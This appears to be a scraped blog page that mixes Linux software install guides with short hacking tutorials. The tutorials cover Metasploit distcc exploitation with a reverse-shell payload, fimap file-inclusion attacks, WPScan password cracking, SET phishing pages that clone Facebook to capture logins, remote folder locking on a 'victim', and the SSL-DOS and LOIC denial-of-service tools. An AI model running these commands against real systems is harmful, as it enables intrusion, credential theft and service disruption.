Install Indicator Reminder for Ubuntu/Linux Mint

indicator reminder for ubuntu :

Indicator Reminder is an indicator app specially designed for Ubuntu to set schedule reminders. It is build using the development tool Quickly and written in Python using GTK+. Indicator Reminder is licensed under the GNU General Public License version 3. These reminders can be configured to play a sound, show a notification, and/or run a command. Want to wake up in the morning? Schedule a reminder every day with music to wake you up.
Indicator Reminder has a powerful date/time selection feature that allows you to express recurring dates/times in plain English. For example: "every day", "every Monday , "every other", "every weekday", "every 30 minutes", and more!. They can also be set to repeat minutely or hourly.

To install indicater reminder in Ubuntu/Linux Mint

• sudo add-apt-repository ppa:bhdouglass/indicator-remindor


• sudo apt-get update


• sudo apt-get install indicator-remindor

or install Reminder-qt via this command:

• sudo add-apt-repository ppa:bhdouglass/indicator-remindor


• sudo apt-get update


• sudo apt-get install remindor-qt

 

VIDEO

How to Recover Deleted Files From Pendrive

Introduction

• fatback is a tool in Backtrack 5 which is used to recover the deleted files from FAT(file Allocation Table ) file system.


• Here fatback first read the FAT image file system then it will recovered all deleted file .


• This tool was developed in  year 2000-2001 at DoD (Department of Defence ) Computer Forensic Lab by SrA Nicholas Harbour.


• fatback  is also  useful  for investigation windows filesystem .

VIDEO :

Create wordlist in crunch

Crunch is a wordlist generator where you can specify a standard character set or a character set you specify. crunch can generate all possible combinations and permutations.

Features

• crunch generates wordlists in both combination and permutation ways


• it can breakup output by number of lines or file size


• now has resume support


• pattern now supports number and symbols


• pattern now supports upper and lower case characters separately


• adds a status report when generating multiple files


• new -l option for literal support of @,%^


• new -d option to limit duplicate characters see man file for details


• now has unicode support

Download Link - http://sourceforge.net/projects/crunch-wordlist/

VIDEO :

Install Smplayer 0.8.4 in ubuntu 13.04

SMPlayer is a free media player for Windows and Linux with built-in codecs that can play virtually all video and audio formats. It doesn't need any external codecs. Just install SMPlayer and you'll be able to play all formats without the hassle to find and install codec packs.

One of the most interesting features of SMPlayer: it remembers the settings of all files you play. So you start to watch a movie but you have to leave... don't worry, when you open that movie again it will be resumed at the same point you left it, and with the same settings: audio track, subtitles, volume...

SMPlayer is a graphical user interface (GUI) for the award-winning MPlayer, which is capable of playing almost all known video and audio formats. But apart from providing access for the most common and useful options of MPlayer, SMPlayer adds other interesting features like the possibility to play Youtube videos or download subtitles.

List of Features:

• Complete preferences dialog, where you can change the key shortcuts, colors and fonts of the subtitles, and many more.


• Filters. Many video and audio filters are available: deinterlace, postprocessing, denoise... and even a karaoke filter (voice removal).


• Seeking by mouse wheel. You can use your mouse wheel to go forward or backward in the video. The mouse buttons can also be customized.


• Video equalizer, allows you to adjust the brightness, contrast, hue, saturation and gamma of the video image.


• Multiple speed playback. You can play at 2X, 4X... and even in slow motion.


• Audio and subtitles delay adjustment. Allows you to sync audio and subtitles.


• Advanced options, such as selecting a demuxer or video & audio codecs.


• Possibility to search and download subtitles from opensubtitles.org.


• It can play Youtube videos. A Youtube browser is included, which allows to easily download Youtube videos too.


• Translations: currently SMPlayer is translated into more than 30 languages, including Spanish, German, French, Italian, Russian, Chinese, Japanese....


• Possibility to change the style and icon set of the interface.


• Free and opensource. SMPlayer is under the GPL license.

Fixes in this Release:

• New option to select the fps for external subtitles.


• YouTube is fixed again.


• Now smplayer checks for updates automatically and notifies the user if a new version is found.


• Support for encoding ISO-8859-16 for subtitles.


• New translations: Thai and Hebrew.


• The video equalizer dialog has been rewritten.


• Some bugfixes.

Supported Input Formats

- (S)VCD (Super Video CD)
- CDRwin's .bin image file
- DVD, including encrypted DVD
- MPEG-1/2 (ES/PS/PES/VOB)
- AVI file format
- ASF/WMV/WMA format
- QT/MOV/MP4 format
- RealAudio/RealVideo format
- Ogg/OGM files
- Matroska
- NUT
- NSV (Nullsoft Streaming Video)
- VIVO format
- FLI format
- NuppelVideo format
- yuv4mpeg format
- FILM (.cpk) format
- RoQ format
- PVA format
- streaming via HTTP/FTP, RTP/RTSP, MMS/MMST, MPST, SDP
- TV grabbing

Supported Video (only the most important are listed)

- MPEG-1 (VCD) and MPEG-2 (SVCD/DVD/DVB) video
- MPEG-4 ASP in all variants including DivX ;-), OpenDivX (DivX4), DivX 5 (Pro), Xvid
- MPEG-4 AVC aka H.264
- Windows Media Video 7/8 (WMV1/2)
- Windows Media Video 9 (WMV3) (using x86 DLL)
- RealVideo 1.0, 2.0 (G2)
- RealVideo 3.0 (RP8), 4.0 (RP9) (using Real libraries)
- Sorenson v1/v3 (SVQ1/SVQ3), Cinepak, RPZA and other QuickTime codecs
- DV video
- 3ivx
- Intel Indeo3 (3.1, 3.2)
- Intel Indeo 4.1 and 5.0 (using x86 DLL or XAnim codecs)
- VIVO 1.0, 2.0, I263 and other H.263(+) variants (using x86 DLL)
- MJPEG, AVID, VCR2, ASV2 and other hardware formats
- FLI/FLC
- HuffYUV
- various old simple RLE-like formats

Supported audio codecs (only the most important are listed)

- MPEG layer 1, 2, and 3 (MP3) audio
- AC3/A52, E-AC3, DTS (Dolby Digital) audio (software or SP/DIF)
- AAC (MPEG-4 audio)
- WMA (DivX Audio) v1, v2
- WMA 9 (WMAv3), Voxware audio, ACELP.net etc (using x86 DLLs)
- RealAudio: COOK, SIPRO, ATRAC3 (using Real libraries)
- RealAudio: DNET and older codecs
- QuickTime: Qclp, Q-Design QDMC/QDM2, MACE 3/6 (using QT libraries), ALAC
- Ogg Vorbis audio
- VIVO audio (g723, Vivo Siren) (using x86 DLL)
- alaw/ulaw, (ms)gsm, pcm, *adpcm and other simple old audio formats

To install SMPlayer in Ubuntu/Linux Mint

• sudo add-apt-repository ppa:rvm/smplayer


• sudo apt-get update


• sudo apt-get install smplayer smtube smplayer-themes

 

Click Here to Donwload Smplayers

VIDEO :

Enumerate Wordpress Users Using Wpscan in Kali Linux

WPScan is a black box WordPress Security Scanner written in Ruby which attempts to find known security weaknesses within WordPress installations. Its intended use it to be for security professionals or WordPress administrators to asses the security posture of their WordPress installations. The code base is Open Source and licensed under the GPLv3.

Features include:

Username enumeration
Weak password cracking (multithreaded)
Version enumeration
Vulnerability enumeration (based on version)
Plugin enumeration (todo)
Plugin vulnerability enumeration (based on version) (todo)
Other miscellaneous checks

 

Installation:

**Please use the up to date instructions found here; http://wpscan.org/

WPScan requires two non native Ruby gems, typhoeus and xml-simple. It should work on both Ruby 1.8.x and 1.9.x.

sudo apt-get install libcurl4-gnutls-dev
sudo gem install –user-install typhoeus
sudo gem install –user-install xml-simple

(I developed WPScan on Backtrack5 Gnome 32bit, if installing on another OS, you may not need the –user-install option when installing the non native gems)

Download:

WPScan will be hosted google code on GitHub at https://github.com/wpscanteam/wpscan.

You can download and start running WPScan ALPHA by checking out cloning the SVN trunk git trunk.
“svn checkout http://wpscan.googlecode.com/svn/trunk/ wpscan-read-only”
git clone https://github.com/wpscanteam/wpscan.git

Example usage:

Examples:
ruby wpscan.rb –url www.example.com
ruby wpscan.rb –url www.example.com –wordlist darkc0de.lst –threads 50
ruby wpscan.rb –url www.example.com –wordlist darkc0de.lst –username admin

 

VIDEO

Install Shotwell Photo Manager in Ubuntu

Shotwell is a digital photo organizer that runs on Linux. Shotwell is an efficient photo organizer designed specifically for the GNOME desktop. It can edit, sort, import, and organize the image collection of the users in fast and secure manner.

What's new in this Release:

• Raw and enhanced image - It’s smarter at keeping paired images together now.


• Better reporting and options to save the details, if something fails.


• Shotwell using new Facebook Graph API‘d


• New types of circular, checkboardular, nifty new wipes.


• Along with all this come many bugs fixed, UI nits squashed and glitches – now fixed.

Shotwell offical Site : http://www.yorba.org

To install shotwell in Ubuntu/Linux Mint

• sudo add-apt-repository ppa:yorba/ppa


• sudo apt-get update


• sudo apt-get install shotwell

Dorking with Fimap in BackTrack 5 R3

fimap is a little python tool which can find, prepare, audit, exploit and even google automaticly for local and remote file inclusion bugs in webapps. fimap should be something like sqlmap just for LFI/RFI bugs instead of sql injection. It's currently under heavy development but it's usable.

The goal of fimap is to improve the quality and security of your website.

Quick News for SVN and upcoming versions

• Bing searching module implemented in SVN! Currently broken :-O


• SSH-Logfiles can now be scanned and exploited through SSH username!


• You can now define which target to exploit and execute shell commands without the interactive exploit interface! (FimapNonInteractiveExec)


• New experimental fallback plugin which you can try when just /etc/passwd (or any other only-readable file was found. (FimapPhpInfoExploit)


• New fallback plugin for windows victims! (FimapFindFirstFileExploit)

what works currently?

• Check a Single URL, List of URLs, or Google results fully automaticly.


• Can identify and exploit file inclusion bugs.
  
  
  
  • Relative\Absolute Path Handling.
  
  
  • Tries automaticly to eleminate suffixes with Nullbyte and other methods like Dot-Truncation.
  
  
  • Remotefile Injection.
  
  
  • Logfile Injection. (FimapLogInjection)
  
  
  
  


• Test and exploit multiple bugs:
  
  
  
  • include()
  
  
  • include_once()
  
  
  • require()
  
  
  • require_once()
  
  
  
  


• You always define absolute pathnames in the configs. No monkey like redundant pathes like:
  
  
  
  • ../etc/passwd
  
  
  • ../../etc/passwd
  
  
  • ../../../etc/passwd
  
  
  
  


• Has a Blind Mode (--enable-blind) for cases when the server has disabled error messages. BlindMode


• Has an interactive exploit mode which...
  
  
  
  • ...can spawn a shell on vulnerable systems.
  
  
  • ...can spawn a reverse shell on vulnerable systems.
  
  
  • ...can do everything you have added in your payload-dict inside the config.py
  
  
  
  


• Add your own payloads and pathes to the config.py file.


• Has a Harvest mode which can collect URLs from a given domain for later pentesting.


• Goto FimapHelpPage for all features.


• Works also on windows.


• Can handle directories in RFI mode like:
  
  
  
  • <? include ($_GET["inc"] . "/content/index.html"); ?>
  
  
  • <? include ($_GET["inc"] . "_lang/index.html"); ?>
  
  
  • where Null-Byte is not possible.
  
  
  
  


• Can use proxys.


• Scans and exploits GET, POST and Cookies.


• Has a very small footprint. (No senseless bruteforcing of pathes - unless you need it.)


• Can attack also windows servers! (WindowsAttack)


• Has a tiny plugin interface for writing exploitmode plugins (PluginDevelopment)
  
  
  
  • Check out the PHPInfo() Exploit plugin: FimapPhpInfoExploit
  
  
  
  


• Non Interactive Exploiting (FimapNonInteractiveExec)

what doesn't work yet?

• Other languages than PHP (even if engine is ready for others as well.)

VIDEO :

Install and enable XScreensaver in ubuntu 12.04.2

XScreenSaver is the standard screen saver collection shipped on most Linux and Unix systems running the X11 Window System. I released the first version in 1992. I ported it to MacOS X in 2006, and to iOS in 2012.On X11 systems, XScreenSaver is two things: it is both a large collection of screen savers; and it is also the framework for blanking and locking the screen.On MacOS systems, these screen savers work with the usual MacOS screen saving framework (X11 is not required).On iOS devices, it is an application that lets you run each of the demo modes manually.

XScreenSaver is a collection of about many free screensavers for Linux.

sudo apt-get remove gnome-screensaver
sudo apt-get install xscreensaver xscreensaver-gl-extra xscreensaver-data-extra

create file for autostart enter following command in terminal:

sudo gedit /etc/xdg/autostart/screensaver.desktop

after that copy and paste the following code in file:

[Desktop Entry]
    Name=Screensaver
    Type=Application
    Exec=xscreensaver -nosplash

Save and Exit the file.

VIDEO :






 

Python Reverse shell

simple reverse shell written in Python (BSIDESLV and Defcon 20 Demo)

Download Python Reverse shell - http://adf.ly/LVvor

VIDEO :

How to install qbittorrent in ubuntu 12.04.2

I think everybody like to download from torrents, It is safe and easy method to download. So you can install qBittorrent with following commands

Commands :

        sudo add-apt-repository ppa:noobslab/initialtesting
        sudo apt-get update
        sudo apt-get install qbittorrent

Download qbittorrent For Windows : http://adf.ly/LSLQr

Description

An advanced and multi-platform BitTorrent client with a nice Qt4 user interface as well as a Web UI for remote control and an integrated search engine. qBittorrent aims to meet the needs of most users while using as little CPU and memory as possible.

Features

• Simultaneous download of multiple torrents


• Integrated torrent search engine


• Integrated RSS feed reader and downloader


• Good internationalization


• DHT, PeX, Encryption, LSD, UPnP, NAT-PMP, µTP


• Cross platform (Linux, Mac Os, Windows)


• Very lightweight


• Torrent queueing and prioritizing


• Control over files in a torrent (filtering, prioritizing)


• Nice µTorrent-like interface with Qt4 toolkit (qBittorrent v2.x)


• IP filtering (eMule dat files or PeerGuardian files)


• Peer display with country and hostname resolution (qBittorrent v2.x)


• Advanced control over torrent trackers (qBittorrent v2.x)


• Closest open source equivalent to µTorrent (qBittorrent v2.x)


• Torrent creation tool


• Remote control through Secure Web User Interface

VIDEO :

Cross Site Request Forgery Vulnerability

Cross-site request forgery, also known as a one-click attack or session riding and abbreviated as CSRF (sometimes pronounced sea-surf or XSRF, is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts.Unlike cross-site scripting (XSS), which exploits the trust a user has for a particular site, CSRF exploits the trust that a site has in a user's browser.

CSRF is an attack which forces an end user to execute unwanted actions on a web application in which he/she is currently authenticated. With a little help of social engineering (like sending a link via email/chat), an attacker may force the users of a web application to execute actions of the attacker's choosing. A successful CSRF exploit can compromise end user data and operation in case of normal user. If the targeted end user is the administrator account, this can compromise the entire web application.

Cross-Site Request Forgery (CSRF) is an attack that tricks the victim into loading a page that contains a malicious request. It is malicious in the sense that it inherits the identity and privileges of the victim to perform an undesired function on the victim's behalf, like change the victim's e-mail address, home address, or password, or purchase something. CSRF attacks generally target functions that cause a state change on the server but can also be used to access sensitive data.

For most sites, browsers will automatically include with such requests any credentials associated with the site, such as the user's session cookie, basic auth credentials, IP address, Windows domain credentials, etc. Therefore, if the user is currently authenticated to the site, the site will have no way to distinguish this from a legitimate user request.

In this way, the attacker can make the victim perform actions that they didn't intend to, such as logout, purchase item, change account information, retrieve account information, or any other function provided by the vulnerable website.

Sometimes, it is possible to store the CSRF attack on the vulnerable site itself. Such vulnerabilities are called Stored CSRF flaws. This can be accomplished by simply storing an IMG or IFRAME tag in a field that accepts HTML, or by a more complex cross-site scripting attack. If the attack can store a CSRF attack in the site, the severity of the attack is amplified. In particular, the likelihood is increased because the victim is more likely to view the page containing the attack than some random page on the Internet. The likelihood is also increased because the victim is sure to be authenticated to the site already.

Synonyms: CSRF attacks are also known by a number of other names, including XSRF, "Sea Surf", Session Riding, Cross-Site Reference Forgery, Hostile Linking. Microsoft refers to this type of attack as a One-Click attack in their threat modeling process and many places in their online documentation.

Prevention measures that do NOT work

Using a secret cookie

Remember that all cookies, even the secret ones, will be submitted with every request. All authentication tokens will be submitted regardless of whether or not the end-user was tricked into submitting the request. Furthermore, session identifiers are simply used by the application container to associate the request with a specific session object. The session identifier does not verify that the end-user intended to submit the request.

Only accepting POST requests

Applications can be developed to only accept POST requests for the execution of business logic. The misconception is that since the attacker cannot construct a malicious link, a CSRF attack cannot be executed. Unfortunately, this logic is incorrect. There are numerous methods in which an attacker can trick a victim into submitting a forged POST request, such as a simple form hosted in attacker's website with hidden values. This form can be triggered automatically by JavaScript or can be triggered by the victim who thinks form will do something else.

Examples

How does the attack work?

There are numerous ways in which an end-user can be tricked into loading information from or submitting information to a web application. In order to execute an attack, we must first understand how to generate a malicious request for our victim to execute. Let us consider the following example: Alice wishes to transfer $100 to Bob using bank.com. The request generated by Alice will look similar to the following:

POST http://bank.com/transfer.do HTTP/1.1
...
...
...
Content-Length: 19;

acct=BOB&amount=100

However, Maria notices that the same web application will execute the same transfer using URL parameters as follows:

GET http://bank.com/transfer.do?acct=BOB&amount=100 HTTP/1.1

Maria now decides to exploit this web application vulnerability using Alice as her victim. Maria first constructs the following URL which will transfer $100,000 from Alice's account to her account:

http://bank.com/transfer.do?acct=MARIA&amount=100000

Now that her malicious request is generated, Maria must trick Alice into submitting the request. The most basic method is to send Alice an HTML email containing the following:

<a href="http://bank.com/transfer.do?acct=MARIA&amount=100000">View my Pictures!</a>

Assuming Alice is authenticated with the application when she clicks the link, the transfer of $100,000 to Maria's account will occur. However, Maria realizes that if Alice clicks the link, then Alice will notice that a transfer has occurred. Therefore, Maria decides to hide the attack in a zero-byte image:

<img src="http://bank.com/transfer.do?acct=MARIA&amount=100000" width="1" height="1" border="0">

If this image tag were included in the email, Alice would only see a little box indicating that the browser could not render the image. However, the browser will still submit the request to bank.com without any visual indication that the transfer has taken place.

Related Attacks

• Cross-site Scripting (XSS)


• Cross Site History Manipulation (XSHM)

Related Controls

• Add a per-request nonce to URL and all forms in addition to the standard session. This is also referred to as "form keys". Many frameworks (ex, Drupal.org 4.7.4+) either have or are starting to include this type of protection "built-in" to every form so the programmer does not need to code this protection manually.


• TBD: Add a per-session nonce to URL and all forms


• TBD: Add a hash(session id, function name, server-side secret) to URL and all forms


• TBD: .NET - add session identifier to ViewState with MAC


• Checking the referrer in the client's HTTP request will prevent CSRF attacks. By ensuring the HTTP request have come from the original site means that the attacks from other sites will not function. It is very common to see referrer checks used on embedded network hardware due to memory limitations. XSS can be used to bypass both referrer and token based checks simultaneously. For instance the Sammy Worm used an XHR to obtain the CSRF token to forge requests.


• "Although cross-site request forgery is fundamentally a problem with the web application, not the user, users can help protect their accounts at poorly designed sites by logging off the site before visiting another, or clearing their browser's cookies at the end of each browser session." -http://en.wikipedia.org/wiki/Cross-site_request_forgery#_note-1


• Tokenizing

VIDEO :

HTTP SSL Certificate Information using Metasploit Auxiliary module

Parse the server SSL certificate to obtain the common name and signature algorithm

Rank

- Normal

Authors

• et < et [at] metasploit.com >


• Chris John Riley < >


• Veit Hailperin < hailperv [at] gmail.com >

msf > use auxiliary/scanner/http/ssl
msf auxiliary(ssl) > set RHOSTS [TARGET HOST RANGE]
msf auxiliary(ssl) > run

Source Code : http://adf.ly/LL7LN

 VIDEO :

 

How to install Zenmap in Kali Linux

Zenmap is the official Nmap Security Scanner GUI. It is a multi-platform (Linux, Windows, Mac OS X, BSD, etc.) free and open source application which aims to make Nmap easy for beginners to use while providing advanced features for experienced Nmap users. Frequently used scans can be saved as profiles to make them easy to run repeatedly. A command creator allows interactive creation of Nmap command lines. Scan results can be saved and viewed later. Saved scan results can be compared with one another to see how they differ. The results of recent scans are stored in a searchable database.

You can download Zenmap (often packaged with Nmap itself) from the Nmap download page. Zenmap is quite intuitive, but you can learn more about using it from the Zenmap User's Guide or check out the Zenmap man page for some quick reference information.

Offical Website - http://adf.ly/LEJ56

VIDEO :

DistCC Daemon Command Execution

This Metasploit exploit uses a documented security weakness to execute arbitrary commands on any system running distccd.

distcc 2.x, as used in XCode 1.5 and others, when not configured to restrict access to the server port, allows remote attackers to execute arbitrary commands via compilation jobs, which are executed by the server without authorization checks.
Exploit RanK - Excellent
Cvss Score - 9.3

Commands :

msfconsole

msf > use exploit/unix/misc/distcc_exec
msf exploit(distcc_exec) > show payloads
msf exploit(distcc_exec) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(distcc_exec) > set LHOST [MY IP ADDRESS]
msf exploit(distcc_exec) > set RHOST [TARGET IP]
msf exploit(distcc_exec) > exploit

VIDEO

Vulnerability Scanner uniscan.pl in Backtrack 5 R3

The Uniscan is a vulnerability scanner for Web applications, written in perl for Linux environment. It was developed as conclusion work of the computer science course of Federal University of Pampa and is licensed under the GNU GENERAL PUBLIC LICENSE 3.0 (GPL 3).

Features Of Uniscan:

• Identification of system pages through a Web Crawler.


• Use of threads in the crawler.


• Control the maximum number of requests the crawler.


• Control of variation of system pages identified by Web Crawler.


• Control of file extensions that are ignored.


• Test of pages found via the GET method.


• Test the forms found via the POST method.


• Support for SSL requests (HTTPS).


• Proxy support.


• Generate site list using Google.


• Generate site list using Bing.


• Plug-in support for Crawler.


• Plug-in support for dynamic tests.


• Plug-in support for static tests.


• Plug-in support for stress tests.


• Multi-language support.


• Web client.


• GUI client written in perl using tk.

For Use :

perl ./uniscan.pl -u http://www.targetsite.com/ -qweds

perl ./uniscan.pl -f sites.txt -bqweds

perl ./uniscan.pl -i uniscan

perl ./uniscan.pl -i xxx.xxx.xxx.xxx

perl ./uniscan.pl -u https://www.targetsite.com/ -r

VIDEO

How to install ubuntu software center in Kali Linux

By default ,ubuntu software center is not install in Kali Linux. If u want to install ubuntu software center in Kali Linux , use this apt-get command.

apt-get install software-center

VIDEO

How to install gedit text editer in Kali Linux

By default , gedit is not install in Kali Linux. If u want to install gedit text editer in Kali Linux , use this apt-get command.

apt-get install geditor

VIDEO

Configure vpn in Kali Linux

By default , vpn is not configure in Kali Linux. If u want to connect vpn in kali linux , first install pptp and network openvpn in kali linux using apt-get install.

Commands :

apt-get install network-manager-openvpn-gnome
apt-get install network-manager-pptp
apt-get install network-manager-pptp-gnome
apt-get install network-manager-strongswan
apt-get install network-manager-vpnc
apt-get install network-manager-vpnc-gnome
/etc/init.d/network-manager restart


Kali Linux forum : http://adf.ly/L6fmv

How to lock and unlock folder in remote victim pc using metasploit

lock and unlock folder :

Once you got the meterpreter session use ‘shell‘command to get command prompt of  the target.
Type Cacls (Folder Name) /e /p everyone:n and press Enter.

VIDEO

How To Use Credential Harvester Attack Method Over Internet

The Social-Engineer Toolkit (SET) is specifically designed to perform advanced attacks against the human element. SET was designed to be released with the http://www.social-engineer.org launch and has quickly became a standard tool in a penetration testers arsenal. SET was written by David Kennedy (ReL1K) and with a lot of help from the community it has incorporated attacks never before seen in an exploitation toolset. The attacks built into the toolkit are designed to be targeted and focused attacks against a person or organization used during a penetration test.


Tools : SET TOOL KIT


OS : Backtrack 5

The credential harvester attack method is used when you don’t want to specifically get a shell but perform phishing attacks in order to obtain username and passwords from the system. In this attack vector, a website will be cloned, and when the victim enters in their user credentials, the usernames and passwords will be posted back to your machine and the victim will be redirected back to the legitimate site.

TUTORIAL VIDEO :

Windows Gather USB Drive History Metasploit Module

This module will enumerate USB Drive history on a target host.

Usage Information

msf > use post/windows/gather/usb_history
msf post(usb_history) > set SESSION [INTEGER]

Module Options

SESSION	The session to run this module on.
VERBOSE	Enable detailed status messages
WORKSPACE	Specify the workspace for this module

The Hacker’s Choice Releases SSL DOS Tool

German hacker group “The Hacker’s Choice” officially released a new DDoS tool. The tool exploits a weakness in SSL to kick a server off the Internet.


Establishing a secure SSL connection requires 15x more processingpower on the server than on the client.THC-SSL-DOS exploits this asymmetric property by overloading theserver and knocking it off the Internet.This problem affects all SSL implementations today. The vendors are awareof this problem since 2003 and the topic has been widely discussed.This attack further exploits the SSL secure Renegotiation featureto trigger thousands of renegotiations via single TCP connection.Download:

Windows binary:
 thc-ssl-dos-1.4-win-bin.zip
Unix Source : thc-ssl-dos-1.4.tar.gz

Usage:
Use "./configure; make all install" to build and Run : ./thc-ssl-dos 127.3.133.7 443Tips & Tricks for 

whitehats
1. The average server can do 300 handshakes per second. This would require 10-25% of your laptops CPU.
2. Use multiple hosts (SSL-DOS) if an SSL Accelerator is used.
3. Be smart in target acquisition: The HTTPS Port (443) is not always the best choice. Other SSL enabled ports are more unlikely to use an SSL Accelerator (like the POP3S, SMTPS, ... or the secure database port).

Counter measurements:
No real solutions exists. The following steps can mitigate (but not solve) the problem:


1. Disable SSL-Renegotiation
2. Invest into SSL Accelerator

How to install Conky Lua in kali Linux

Conky Lua is very nice gadget for every linux user, It shows usage of your system like cpu, disk, memory, net upload and download speed, also date & time. Many users wrote me about this gadget, they like it so much. So Now we will start. I customized this gadget in different flavors.


Install Conky in Ubuntu/Linux Mint open terminal (Press Ctrl+Alt+T) and copy the following commands in the Terminal:

• sudo apt-get install conky conky-all

Install by yourself in other distro's.


First of all Download Startup script with following commands:

• wget -O .start-conky http://goo.gl/6RrEw


• chmod +x .start-conky

Now open Startup Applications > click Add  > New Dialog box will open click on Browse > Now

To Install Green-Flavor open Terminal and enter following commands:

• wget -O conky-green.zip http://goo.gl/WlDxp


• unzip conky-green.zip && sudo rm conky-green.zip

 

 

How to install armitage in Kali Linux

The Kali Linux team added an Armitage package to its repository:
apt-get install armitage

• Before you start Armitage, start postgresql database is running:

                              service postgresql start

• If U get a missing database.yml error

                              service metasploit start
VIDEO :

How to install vmware tools in kali linux

How to install Kali Linux in vmware(VIDEO)



How to install vmware tools in kali linux

How to install Kali Linux in vmware

Kali is a complete re-build of BackTrack Linux, adhering completely to Debian development standards. All-new infrastructure has been put in place, all tools were reviewed and packaged, and we use Git for our VCS.




Download Kali Linux - http://adf.ly/Kyb1o

How to install LOIC(Low Orbit Ion Cannon) in Backtrack 5 R3

LOIC performs a denial-of-service (DoS) attack (or when used by multiple individuals, a DDoS attack) on a target site by flooding the server with TCP packets or UDP packets with the intention of disrupting the service of a particular host. People have used LOIC to join voluntary botnets.

Install LOIC :

1 - aptitude install git-core monodevelop

2 - Download loic.sh script wget https://raw.github.com/nicolargo/loicinstaller/master/loic.sh

3 - Make Folder - mkdir <folder name>

4 - install - ./loic.sh install

5 - update - ./loic.sh update

6 - Run loic - ./loic.sh run

Webapplication Attack : dos And ddos attacks[Video Demonstration]

What is a denial-of-service (DoS) attack?
In a denial-of-service (DoS) attack, an attacker attempts to prevent legitimate users from accessing information or services. By targeting your computer and its network connection, or the computers and network of the sites you are trying to use, an attacker may be able to prevent you from accessing email, websites, online accounts (banking, etc.), or other services that rely on the affected computer.

The most common and obvious type of DoS attack occurs when an attacker "floods" a network with information. When you type a URL for a particular website into your browser, you are sending a request to that site's computer server to view the page. The server can only process a certain number of requests at once, so if an attacker overloads the server with requests, it can't process your request. This is a "denial of service" because you can't access that site.

An attacker can use spam email messages to launch a similar attack on your email account. Whether you have an email account supplied by your employer or one available through a free service such as Yahoo or Hotmail, you are assigned a specific quota, which limits the amount of data you can have in your account at any given time. By sending many, or large, email messages to the account, an attacker can consume your quota, preventing you from receiving legitimate messages.

What is a distributed denial-of-service (DDoS) attack?
In a distributed denial-of-service (DDoS) attack, an attacker may use your computer to attack another computer. By taking advantage of security vulnerabilities or weaknesses, an attacker could take control of your computer. He or she could then force your computer to send huge amounts of data to a website or send spam to particular email addresses. The attack is "distributed" because the attacker is using multiple computers, including yours, to launch the denial-of-service attack.

dos and ddos attacks


Attacker exhaust available server resources by sending hundreds of resource-intensive requests,such as pulling out large image files or requesting dynamic pages that require expensive search operations on the backend database servers

Why Are Application Vulnerable?

• Reasonable Use Expectations


• Application Environment Bottlenecks


• Implementation Flaws


• poor Data Validation

Web Server Resource ConsumptionTargets

• CPU,Memory and Sockets


• Disk Bandwidth


• Database Bandwidth


• Worker Processes

Web Services UnavailabilityApplication-Level DOS attacks enulate the same request syntex and network-Level traffic characteristics as that of the legitimate clients,which makes it undetectable by existing DOS protection measures .

Login Attacks
The attacker may overload the login process by continually sending login requests that require the presentation tier to access the authentication mechanism,rendering it unavailable or unreasonably slow to respond.User Registration DOSThe attacker could create a program that submits the registration forms repeatedly ;adding a large number of squrious users to the application.

Account Lock-OUT Attacks

The attacker may enumerate username through another vulerability n the application and then attempt to authenticate to the site using valid username and incorrect passwords which will lock out the account after the specified number of failed attempts.At this point legitimate users will not be able to use the site .

User Enumeration

If application states which part of the username/password pair is incorrect,an attacker can automate the process of trying common usernames from a dictionary file to enumerate the users of the Application.

How do you know if an attack is happening?

Not all disruptions to service are the result of a denial-of-service attack. There may be technical problems with a particular network, or system administrators may be performing maintenance. However, the following symptoms could indicate a DoS or DDoS attack:

•     unusually slow network performance (opening files or accessing websites)


•     unavailability of a particular website


•     inability to access any website


•    dramatic increase in the amount of spam you receive in your account

How do you avoid being part of the problem?

Unfortunately, there are no effective ways to prevent being the victim of a DoS or DDoS attack, but there are steps you can take to reduce the likelihood that an attacker will use your computer to attack other computers:

•     Install and maintain anti-virus software (see Understanding Anti-Virus Software for more information).


•     Install a firewall, and configure it to restrict traffic coming into and leaving your computer (see Understanding Firewalls for more information).


•     Follow good security practices for distributing your email address (see Reducing Spam for more information). Applying email filters may help you manage unwanted traffic.

How to share folder in Backtrack 5 R3 to make accessible in Windows

1. Open your terminal (CTRL+ALT+T) and then run this command to create a new directory "share".

mkdir /var/www/share 

2. Change mode for the share folder into 755.

chmod -R 755 /var/www/share/ 


3. Change the ownership of that folder into www-data.

chown -R www-data:www-data /var/www/share/

5. Okay, everything we've set up correctly until this step. The next step is activate the apache server by running the service apache2 start command :

root@bt:~# service apache2 start 
* Starting web server apache2

if you didn't have apache2 installed, run
apt-get install apache2 command

Web Jacking Attack

 

The Web Jacking Attack Vector is another phishing technique that can be used in social engineering engagements.Attackers that are using this method are creating a fake website and when the victim opens the link a page appears with the message that the website has moved and they need to click another link.If the victim clicks the link that looks real he will redirected to a fake page.


The social engineering toolkit has already import this kind of attack.So we are going to use the SET in order to implement this method.We are opening SET and we select the option 2 which is the Website Attack Vectors.

We will see a list with the available web attack methods.The attack that we are going to use is of course the Web Jacking Attack so we select option number 6.

In the next menu we have 3 options:

•     Web Templates


•     Site Cloner


•     Custom Import

We will select the site cloner in order to clone the website of our interest.Remember that this type of attack works with the credential harvester method so we need to choose a website that it has username and password fields in order the attack to have success.For this scenario as you can see in the image below we have select to clone Facebook because of its popularity.

Now it is time to send our the link with our IP address to the victim.Lets see what the victim will see if he opens the link.

As you can see a message will appear informing the user that the website has moved to a new location.The link on the message seems valid so any unsuspicious users will click on the link.At that time a new page will load into the victim’s browser which it will be fake and is running on our web server.

If the victim enters his credentials into the fake Facebook page that looks like the real one then we will be able to capture his username and password.The next image is showing that:

How to Use Tor in Backtrack 5 R3 Whole System Using Proxychains

Proxychains is open source software for GNU/Linux systems.

proxychains - a tool that forces any TCP connection made by any given application
to follow through proxy like TOR or any other SOCKS4, SOCKS5 or HTTP(S) proxy.

How to install Tor and Polipo in Backtrack 5 R3





How to Use Tor in Backtrack 5 R3 Whole System Using Proxychains

How To install Tor in Backtrack 5 R3

Tor is an open source Anonymous Internet tool. It protects your personal identification from tracking systems by changing the source IP address frequently. Application will create many virtual tunnels through the tor network.By default Tor is not integrated in BackTrack 5. Why use Tor on Backtrack ? Normally Tor is used to protect the browsing security but Tor can be used for network scanning tools and other information gathering tools or by student for Educational Purpose.In this my article i will show you how to install TOR properly on Backtrack . Dont Be Hesitate If You are Unable to Take Advantage of this post . Put YOUR Question with Me I will quickly give your answer .




So Let Us Start
I do not recommend just using TOR for your proxy. It's wise to layer your anonymity (Including your router,  if you're working off a Desktop).

start. Open the Terminal.
step 1. #cd /etc/apt
#ls

step 2. #vi sources.list
